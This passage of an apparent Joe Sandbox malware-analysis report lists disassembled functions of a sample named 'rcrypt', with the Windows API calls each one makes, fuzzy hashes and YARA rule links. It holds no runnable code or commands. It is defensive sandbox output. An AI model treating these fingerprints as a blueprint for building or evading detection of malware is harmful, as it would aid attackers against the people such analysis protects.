Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
Instruction ID: 62c258072cfe5d15cd4956b1d0e7e4d015a701e9c3bf2d7ee6e18994e0275dfa
Opcode Fuzzy Hash: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
Instruction Fuzzy Hash: 30319F35600118AFCB15CF58C898EEABBBAEB49710F04816DF9098B661C7359E91DFA1

Function 00148B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00148669
Part of subcall function 00148652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00148673
Part of subcall function 00148652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00148682
Part of subcall function 00148652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00148689
Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0014869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00148BEB
_memcmp.LIBCMT ref: 00148C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00148C44
HeapFree.KERNEL32(00000000), ref: 00148C4B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
Instruction ID: 4b8514149b99375ef22897d4cdcd637886b0fc1803c621912718282a3d1a3c7b
Opcode Fuzzy Hash: ce340c19acc9982c7e741c16f66ce0b9591f23ccc48fa4c1017e9d1e51e60053
Instruction Fuzzy Hash: 9121AC71E01208EFCB00CFA4C984BEEB7B9EF40344F044069E458A7250DB31AE46CB60

Function 00110BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00110BF2

Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0

_fprintf.LIBCMT ref: 00110C29
OutputDebugStringW.KERNEL32(?), ref: 00146331

Part of subcall function 00114CDA: _flsall.LIBCMT ref: 00114CF3

__setmode.LIBCMT ref: 00110C5E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: d947429b2c0308b79726327a6bcf7d5fac4204953860efed0e380708da37606d
Instruction ID: 5903df4c3d1c2dc6c08cc713f471f7b716a75c9e5ec65b7a8dd014784815dcc0
Opcode Fuzzy Hash: d947429b2c0308b79726327a6bcf7d5fac4204953860efed0e380708da37606d
Instruction Fuzzy Hash: 791124329082087BCB0DB7B4AC42AFE7B689F59720F14017AF208971D2DF615DC69BD5

Function 00161A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00161A97

Part of subcall function 00161B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00161B40
Part of subcall function 00161B21: InternetCloseHandle.WININET(00000000), ref: 00161BDD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 2a74df0b9a6c90505e20661e4afc57634cd9f79b634f38ab1caae61560f293cc
Instruction ID: 05161f6effe1e1e4af39de93f4ddcc0014a798bb7c0660e39b9b706eb0da46be
Opcode Fuzzy Hash: 2a74df0b9a6c90505e20661e4afc57634cd9f79b634f38ab1caae61560f293cc
Instruction Fuzzy Hash: FF21CF35200A01BFDB159FA08C01FBBB7B9FF54702F18401AFA0696650EB319861DBA0

Function 0014E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0014F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F5BC
Part of subcall function 0014F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0014F5E2
Part of subcall function 0014F5AD: lstrcmpiW.KERNEL32(00000000,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0014E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E237

Strings

cdecl, xrefs: 0014E22E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 9808de1ff635908f7f14bacc61b5077ab2eb51b85fb0848a21ae7ec198a1f95d
Instruction ID: 1a78b59e2bd2569edd359f8c68d50e33de81c00743668e708d2496a1883e086e
Opcode Fuzzy Hash: 9808de1ff635908f7f14bacc61b5077ab2eb51b85fb0848a21ae7ec198a1f95d
Instruction Fuzzy Hash: 24118E3A200345EFCB25AF74D845D7A77B8FF89350B40403AF806CB260EBB19891D7A0

Function 00125332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00125351

Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00A50000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 15207816a7113010662b77cd4381b72ae36342e4c01728906f9784c67056c795
Instruction ID: e224135e5820c34999795d4088bc88b902f9b8d62501ace8ac2107f5c83b5f30
Opcode Fuzzy Hash: 15207816a7113010662b77cd4381b72ae36342e4c01728906f9784c67056c795
Instruction Fuzzy Hash: DB112732904B35AFCF286F70BC856AE3796BF243A4F209439F9049A191DF7089D18390

Function 000F4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F4560

Part of subcall function 000F410D: _memset.LIBCMT ref: 000F418D
Part of subcall function 000F410D: _wcscpy.LIBCMT ref: 000F41E1
Part of subcall function 000F410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1

KillTimer.USER32(?,00000001,?,?), ref: 000F45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0012D6CE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c97644f9bcedd6897be5915d74e588d37118d09269d099299fc62f51bbbda8f0
Instruction ID: 8a20ef6665df828a5679aa3cec75e55812b1091788903adc9cff41f39e16b5c1
Opcode Fuzzy Hash: c97644f9bcedd6897be5915d74e588d37118d09269d099299fc62f51bbbda8f0
Instruction Fuzzy Hash: 5F210770908798AFEB329B24E845BF7BBEC9F11304F00009DE79E56282C7741AC49B51

Function 001540B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001540D1
_memset.LIBCMT ref: 001540F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00154144
CloseHandle.KERNEL32(00000000), ref: 0015414D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 5a450c752bc4162e50a6dcad86c392e44d499d70e2c5a1ecd42a4db0159c7cee
Instruction ID: 58ced24e8742c20e26775c21a25a5267e234d36115732361d822b2c03df7f341
Opcode Fuzzy Hash: 5a450c752bc4162e50a6dcad86c392e44d499d70e2c5a1ecd42a4db0159c7cee
Instruction Fuzzy Hash: 4911A775901228BAD7309BA5AC4DFEBBBBCEF44764F1041AAF918D7180D6744EC4CBA4

Function 0016667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0

gethostbyname.WSOCK32(?,?,?), ref: 001666AC
WSAGetLastError.WSOCK32(00000000), ref: 001666B7
_memmove.LIBCMT ref: 001666E4
inet_ntoa.WSOCK32(?), ref: 001666EF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: aa3b87df951d01e82fc2f19f8c2533114fd0ef8ed24e128e1bea2cb7513211a2
Instruction ID: 782e5007a9762028d961e6cf2e62082850298cc10e9032e11625ce369ed76efc
Opcode Fuzzy Hash: aa3b87df951d01e82fc2f19f8c2533114fd0ef8ed24e128e1bea2cb7513211a2
Instruction Fuzzy Hash: 1611B235900508AFCB04FBA4DD96DFEB7B8AF18311B184029F606A7562DF30AE54DB62

Function 00149023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00149043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0014906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149086

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cdc198c36983dbca10f8945227224756ec9b0852920ceee6750169ea2f93393e
Instruction ID: 5cb89fb6fb146c448f67ce843ffa5278586adbe45485a9560efdfe512888bbdd
Opcode Fuzzy Hash: cdc198c36983dbca10f8945227224756ec9b0852920ceee6750169ea2f93393e
Instruction Fuzzy Hash: CE114C79940218FFDB10DFA5C884E9EBB78FB48710F204095F904B7260D7716E50DB90

Function 000F1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8
GetClientRect.USER32(?,?), ref: 0012B84B
GetCursorPos.USER32(?), ref: 0012B855
ScreenToClient.USER32(?,?), ref: 0012B860

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0a50fa0abd7c347490d68c93e5c0c2bf4357778e1022f28916c078fe2035ee24
Instruction ID: 570337ac78aadc242ccbae5e5bbcdca8a3baf9de2fba9ed3f4d206fe86b1ad36
Opcode Fuzzy Hash: 0a50fa0abd7c347490d68c93e5c0c2bf4357778e1022f28916c078fe2035ee24
Instruction Fuzzy Hash: 9C113A3590001DEFCB50EFA4D8859FE77B8FB05310F000455FA05E7951C731BAA2ABA5

Function 00151652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 00151694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015169E
Sleep.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 001516D1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c47c7ac0fb77bddaa4d8959ae5026845bac852755eb690b7e7ff488b0b985a26
Instruction ID: eaefd30249ca9c52753f56989231f93d81748008b5a86241545e9f5319b3468d
Opcode Fuzzy Hash: c47c7ac0fb77bddaa4d8959ae5026845bac852755eb690b7e7ff488b0b985a26
Instruction Fuzzy Hash: 30112531C00518E7CB059FA5D848BEEBB78BB09712F854059E954AA240CBB055A48BA6

Function 00127207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0012722B

Part of subcall function 00127912: __fltout2.LIBCMT ref: 0012793B

__cftog_l.LIBCMT ref: 00127251
__cftoe_l.LIBCMT ref: 00127283

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 854567406a0f4dc4f097a32defb4f9e41ca3461b160cdc2a500827c238f1593e
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 29018C320481AAFBCF165F84EC028EE3F22BF29354B098615FA1858071C337C9B1AB81

Function 0017B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0017B59E
ScreenToClient.USER32(?,?), ref: 0017B5B6
ScreenToClient.USER32(?,?), ref: 0017B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0017B5F5

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
Instruction ID: 64664c7ee4a772188ba779af98c41dbcef8a517cacf372c2236977fcb92f8bf9
Opcode Fuzzy Hash: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
Instruction Fuzzy Hash: BE1146B5D04209EFDB41DF99C884AEEFBB5FB08310F108166E914E3620D735AA958F50

Function 0017B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0017B8FE
_memset.LIBCMT ref: 0017B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001B7F20,001B7F64), ref: 0017B93C
CloseHandle.KERNEL32 ref: 0017B94E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
Instruction ID: 9a9174f81d6584a34d70a86a3c8053788967a9eef5568da06d81093a8034f30b
Opcode Fuzzy Hash: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
Instruction Fuzzy Hash: B3F05EB25443007BE2106B71AC05FBB3AACEB48354F004038FB1CE65D2D7718980C7AC

Function 00156E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00156E88

Part of subcall function 0015794E: _memset.LIBCMT ref: 00157983

_memmove.LIBCMT ref: 00156EAB
_memset.LIBCMT ref: 00156EB8
LeaveCriticalSection.KERNEL32(?), ref: 00156EC8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
Instruction ID: f70d04f97b322e5e002ce9bb62b431bd3d0e25264f23cc5ef149f67f40ef4fa6
Opcode Fuzzy Hash: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
Instruction Fuzzy Hash: D1F0543A104200BBCF016F55DC85E8ABB2AEF59321B048065FE085E21BC731E991CBB4

Function 0017C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C030
LineTo.GDI32(00000000,?,?), ref: 0017C03D
EndPath.GDI32(00000000), ref: 0017C04D
StrokePath.GDI32(00000000), ref: 0017C05B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
Instruction ID: 24c31aa85d029a79d37f816c064749af88999ba210e283738b952022f8bc2a9c
Opcode Fuzzy Hash: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
Instruction Fuzzy Hash: 40F0BE31000219FBDB122F50AC09FCE3FAAAF15310F148008FA19215E2877909E2CBD5

